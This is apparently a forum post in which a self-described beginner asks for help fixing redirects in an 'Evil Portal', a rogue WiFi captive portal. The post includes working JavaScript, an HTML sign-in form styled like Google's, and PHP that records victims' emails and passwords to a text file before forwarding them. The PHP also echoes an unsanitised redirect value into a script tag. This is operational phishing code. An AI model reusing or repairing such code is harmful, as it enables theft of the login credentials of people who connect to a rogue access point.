Hi Friends!
I've spent an insane amount of time on this last bit of code. I've used the google-fu as best I can for being relatively noobish, I've read through all the 'Evil Portal' searches I can find. I'm relatively new to code, so please bare with me.
With that said, I'm having a problem with redirects.
I have an evil portal deployed it dumps the username, password, redirect then the token to a text file. (the reason I'm currently dumping the last two is for troubleshooting).
When I click my final link and start the capture everything goes through and is logged correctly into the capture file.
Afterwords the capture my redirect takes me to:
"http://192.168.10.1/capture.php?Email=547,&Password=547,&redir1=http://192.168.10.1:8080/nodogsplash_auth/?redir=http%3A%2F%2Fwww.test.com%2F&tok=8af6d405"
which then redirects to:
http://192.168.10.1:8080/nodogsplash_auth/?redir=http://www.test.com/
somehow I'm losing the token on the 2nd redirect, also it seems that I'm picking up more than just the path of the redirect when I use the $redir var.
If I pump in "http://www.test.com/tok=8af6d405" everything works just fine, validates and online.
Here is my java:
<script type="text/javascript" charset="utf-8">
function submitTextToCapture() {
var email = document.getElementById("Email").value;
var password = document.getElementById("Passwd").value;
window.location = "http://192.168.10.1/capture.php?Email="+email+",&Password="+password+",&redir1=$authtarget";
}
</script>
PHP
<?php
$username = $_GET["Email"];
$password = $_GET["Password"];
$redir = $_GET["redir1"];
$token = $_GET["tok"];
$file = fopen("stored.txt", "a");
fwrite($file, $username . $password . $redir . $token . "\n");
fclose($file);
echo '<script type="text/javascript">window.location = "' . $redir . '";</script>';
?>
Button stuff:
<form id="PWND" method="POST" action="http://192.168.10.1/capture.php">
<label class="hidden" for="Email">Email</label>
<input id="Email" name="Email" type="Email" placeholder="Email" value="" spellcheck="false" class="">
<label class="hidden" for="Passwd">Password</label>
<input id="Passwd" name="Passwd" type="Password" placeholder="Password" class="">
<input type="button" class="rc-button rc-button-submit" onClick="submitTextToCapture()" value="Sign in" src="$authtarget">
it looks like I need to cut this (http://192.168.10.1:8080/nodogsplash_auth/) string in the first link and I can manage but it looks like that is loaded into the redir variable from the get go?
Any help would be much appreciated.